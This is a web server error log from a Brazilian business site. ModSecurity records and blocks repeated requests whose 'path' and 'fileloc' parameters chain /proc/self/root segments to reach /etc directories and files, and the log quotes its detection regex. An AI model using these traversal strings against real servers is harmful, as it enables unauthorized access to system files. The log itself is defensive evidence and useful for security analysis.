https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:13:00.130309 2026] [proxy_fcgi:error] [pid 9299:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:44712] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:13:04.885206 2026] [:error] [pid 9299:tid 140411590858496] [client 74.7.241.31:54898] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmZsL-sgTmmJoPuMdy9hgAAAtI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:13:16.442712 2026] [:error] [pid 9299:tid 140411641214720] [client 74.7.243.128:46448] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmZvL-sgTmmJoPuMdy9lwAAAsw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:13:22.124811 2026] [proxy_fcgi:error] [pid 6296:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:45678] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:13:23.710194 2026] [:error] [pid 17965:tid 140411582465792] [client 74.7.244.43:53918] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abmZw6t8Nd0UC_OcbVHRmQAAAJM"]
[Tue Mar 17 15:13:31.899224 2026] [:error] [pid 7004:tid 140411699963648] [client 74.7.241.31:51686] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmZy8U6Sx0TG1YjmQi2WAAAAoU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:13:32.449534 2026] [:error] [pid 29151:tid 140411649607424] [client 74.7.228.61:33674] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abmZzPPqhzTj3BvfDX-PAAAAAcs"]
[Tue Mar 17 15:13:35.172722 2026] [:error] [pid 9299:tid 140411716749056] [client 74.7.241.31:37858] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmZz7-sgTmmJoPuMdy9owAAAsM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 15:13:43.127116 2026] [proxy_fcgi:error] [pid 19507:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:46606] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:13:53.593529 2026] [:error] [pid 2473:tid 140411666392832] [client 74.7.243.128:45004] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmZ4aBJNF7axNlVR0UflgAAAAk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:13:56.537074 2026] [:error] [pid 9299:tid 140411540502272] [client 74.7.243.128:56778] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmZ5L-sgTmmJoPuMdy9pwAAAtg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:14:07.121799 2026] [proxy_fcgi:error] [pid 17965:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:47436] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:14:13.495194 2026] [:error] [pid 2598:tid 140411565680384] [client 74.7.241.31:37860] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmZ9Rj0p0SRWAqcjGGAvgAAAxU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:14:16.771585 2026] [:error] [pid 2473:tid 140411632822016] [client 74.7.241.31:47368] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmZ-KBJNF7axNlVR0UfngAAAA0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 15:14:29.125784 2026] [proxy_fcgi:error] [pid 2598:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:47784] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:14:51.433817 2026] [proxy_fcgi:error] [pid 29151:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:48302] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:14:59.596558 2026] [:error] [pid 2598:tid 140411683178240] [client 74.7.243.128:56786] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmaIxj0p0SRWAqcjGGA3AAAAwc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:15:14.089805 2026] [proxy_fcgi:error] [pid 7004:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:49074] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:15:22.838366 2026] [:error] [pid 2598:tid 140411741927168] [client 74.7.243.128:56786] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmaOhj0p0SRWAqcjGGA8AAAAwA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:15:26.821779 2026] [:error] [pid 18380:tid 140411725141760] [client 74.7.241.31:55866] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmaPq4xEDsg_V3ESNZTawAAAgI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 15:15:36.075526 2026] [proxy_fcgi:error] [pid 2473:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:49790] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:15:44.680348 2026] [:error] [pid 6296:tid 140411666392832] [client 74.7.243.128:43752] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmaUHIk7brgkOH-rIWTCwAAAUk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:15:49.249866 2026] [:error] [pid 2473:tid 140411574073088] [client 74.7.243.128:48566] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmaVaBJNF7axNlVR0UfyAAAABQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:16:03.125811 2026] [proxy_fcgi:error] [pid 2473:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:50926] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:16:27.473800 2026] [proxy_fcgi:error] [pid 2473:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:51896] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:16:31.156412 2026] [:error] [pid 18380:tid 140411557287680] [client 74.7.241.31:55866] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmaf64xEDsg_V3ESNZTogAAAhY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 15:16:43.350281 2026] [core:alert] [pid 6296:tid 140411607643904] [client 74.7.241.31:37986] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root
[Tue Mar 17 15:16:49.073839 2026] [proxy_fcgi:error] [pid 29151:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:53104] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:17:10.817902 2026] [proxy_fcgi:error] [pid 7437:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:53766] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:17:13.410233 2026] [:error] [pid 18380:tid 140411565680384] [client 74.7.243.128:60584] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmaqa4xEDsg_V3ESNZTvgAAAhU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 15:17:17.091030 2026] [:error] [pid 19507:tid 140411548894976] [client 74.7.241.31:37998] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/statetab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmardY0UrI5A3LftIwEVgAAAZc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 15:17:18.865029 2026] [:error] [pid 9299:tid 140411624429312] [client 74.7.241.31:47582] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/subuid"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmarr-sgTmmJoPuMdy98QAAAs4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 15:17:21.356509 2026] [:error] [pid 7437:tid 140411708356352] [client 74.7.241.31:47596] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmasAeiSKl8TjouI-YgtwAAA8Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 15:17:34.112881 2026] [proxy_fcgi:error] [pid 7437:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:54310] AH01075: Error dispatching request to : (polling)
